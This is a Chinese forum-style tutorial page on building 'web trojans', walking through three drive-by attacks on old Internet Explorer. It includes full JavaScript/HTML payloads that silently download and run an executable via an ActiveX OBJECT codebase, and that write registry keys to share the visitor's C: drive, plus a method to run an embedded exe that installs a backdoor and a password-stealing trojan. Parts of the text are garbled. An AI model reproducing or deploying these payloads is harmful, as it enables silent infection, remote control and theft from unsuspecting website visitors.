- 热门文章:
- · 网页病毒的概念
- · 查看开放端口:让木马现形
- · 为了安全,请管好你的IP地址
- · 最新找到的恶意网站大集合
- · 当菜鸟遇上黒客之二:端口扫描
- · 如何利用网页改写注册表
- · 当菜鸟遇上黒客之四:信息窃取
- · 如何成为一名黑客
- · 如何成为一名黑客(二)
- · 最后的战役:漏洞攻击
- · 关闭netbios服务
- · win2k的3389端口攻击
上一篇:小心Web方式泄漏秘密 >>
制作网页木马
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"test.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://dhj.126.com连接目标地址里...褪枪蚕砹恿恕?/a>
这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。
3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处
(出处:落伍者论坛)
下一篇:网页病毒的概念 >>
相关文章:
- · 网络安全的若干问题
- · UNICODE漏洞的原理
- · 你能拿到这台机的一个文件吗
- · 从一次渗透测试谈起
- · 建立隐藏的超级用户
- · ASP网络安全
- · asp木马配合servu取得管理员权限
- · 无进程DLL木马开发思路与实现
- · 图文教程让你的机更安全
- · 金山毒霸6的三个特殊应用
- · 开3389最简单得方法
- · rpc漏洞的利用
- · 教你手工剿灭QQ广告弹出木马
- · 暴力测试:谁家杀毒软件可防QQ密码被盗
- · 网络安全之特洛伊木马攻防战略
- · 防病毒必务宝典—计算机病毒专杀进程列表
- · 快速有效地封杀—巧利用Iris来查找蠕虫病毒
- · 木马病毒清除的通用解法
- · Win 2000防毒从安装系统时开始
- · 邮件病毒入侵后五个清除步骤
- · 快速干掉感染Internet Explorer的恶意程序
- · 如何根据名称识别计算机病毒
- · 变种蠕虫Bugbear.B卷土重来…
- · McAfee将Bugbear蠕虫病毒定…
- · 最新蠕虫变种以比尔·盖茨的…
- · 芬兰F-Secure等发布新蠕虫“…
- · 2003年病毒感染途径呈现增长…
- · 手机“病毒”分析
- · 新蠕虫!专门针对无密码SQL…
- · 反病毒监测网截获第4个“冲…
- · 实例讲解网站被入侵后需做的检测
- · ASP木马Webshell安全解决方案
- · DDoS攻击原理以及常见方法
- · 揭密网络数据加密的三种技术
- · 冰盾防御CC攻击的简单设置
- · 谨防黑客通过端口扫描进行攻击
- · 打造黑客也读不懂的安全密码
- · 笔记本电脑的物理安全防范